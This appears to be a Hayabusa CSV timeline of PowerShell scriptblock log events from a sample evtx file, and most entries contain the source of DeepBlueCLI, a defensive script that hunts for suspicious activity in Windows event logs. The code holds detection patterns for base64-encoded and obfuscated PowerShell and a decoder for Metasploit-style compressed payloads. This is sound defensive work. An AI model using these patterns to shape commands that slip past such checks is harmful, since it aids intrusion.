$pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } # Ignoring PowerShell event 4014 for now, DeepBlueCLI currently detects its own strings, and hilarity ensues ElseIf ($event.id -eq 4104){ # Check of MessageTotal == 1) if ($eventxml.Event.EventData.Data[1].""#text"" -eq 1){ #$eventxml.Event.EventData.Data[1].""#text"" $pscommand=$eventXML.Event.EventData.Data[4].""#text"" $output += (Check-Command $pscommand 9999 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. 
Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:41:37.567 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. 
# Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:41:37.570 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" 
{$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:41:50.476 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. 
$decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:41:50.476 +00:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:41:50.477 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. 
# $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:41:50.477 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. 
Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:41:51.309 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:42:14.153 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"Get-WinEvent @{logname=""Microsoft-Windows-PowerShell/Operational"";ID=4104}|fl|more",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:42:19.463 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:42:22.680 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.2.ps1 """" powershell",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:42:36.639 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:43:05.016 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.2.ps1 """" powershell",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:43:05.021 +00:00,SEC511,4104,medium,,Potentially Malicious 
PwSh,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. .Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue backshore net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. 
(Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. 
$servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. 
$output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } # Ignoring PowerShell event 4014 for now, DeepBlueCLI currently detects its own strings, and hilarity ensues ElseIf ($event.id -eq 4104){ # Check of MessageTotal == 1) if ($eventxml.Event.EventData.Data[1].""#text"" -eq 1){ $eventxml.Event.EventData.Data[4].""#text"" $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 9999 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + 
""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. 
# Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational""",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:43:05.021 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. 
.Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue backshore net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. 
$username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... 
service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. 
$pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } # Ignoring PowerShell event 4014 for now, DeepBlueCLI currently detects its own strings, and hilarity ensues ElseIf ($event.id -eq 4104){ # Check of MessageTotal == 1) if ($eventxml.Event.EventData.Data[1].""#text"" -eq 1){ $eventxml.Event.EventData.Data[4].""#text"" $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 9999 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. 
Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an 